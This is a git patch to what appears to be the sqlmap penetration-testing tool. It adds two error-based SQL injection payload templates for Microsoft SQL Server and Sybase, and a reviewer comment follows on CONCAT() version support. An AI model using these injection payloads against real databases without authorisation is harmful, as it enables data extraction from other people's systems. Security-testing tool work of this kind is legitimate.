From 439fff684effe7526c99a5b7fb5681cf06470342 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 11 May 2016 09:42:54 +0200
Subject: [PATCH] Minor update (MSSQL CONCAT payload)
---
 lib/core/settings.py | 2 +-
 xml/payloads/02_error_based.xml | 42 +++++++++++++++++++++++++++++++++
 2 files changed, 43 insertions(+), 1 deletion(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 50f02decb..e86773aa9 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS from lib.core.revision import getRevisionNumber # sqlmap version (...)
-VERSION = "1.0.5.18"
+VERSION = "1.0.5.19"
 REVISION = getRevisionNumber()
 STABLE = VERSION.count('.') <= 2
 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
diff --git a/xml/payloads/02_error_based.xml b/xml/payloads/02_error_based.xml
index 42737fbdb..72fc87199 100644
--- a/xml/payloads/02_error_based.xml
+++ b/xml/payloads/02_error_based.xml
@@ -388,6 +388,48 @@ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT) + 2 + 2 + 1 + 1,9 + 1 + AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT) + 2 + 3 + 3 + 1,9 + 2 + OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+
+ Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) 2
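Review bot: Both added entries are titled "(CONCAT)" and list Microsoft SQL Server and Sybase with no version qualifier, but SQL Server only provides CONCAT() from the 2012 release onward, so the scope of these tests is narrower than the titles suggest. I have not confirmed Sybase support for the function, and the element markup is not visible in this rendering, so this may already be recorded in a tag I cannot see. If it is not, a comment above the first entry would document it, for example `<!-- CONCAT() requires SQL Server 2012 or later; older servers reject the function name -->`. The same applies to the OR variant that follows.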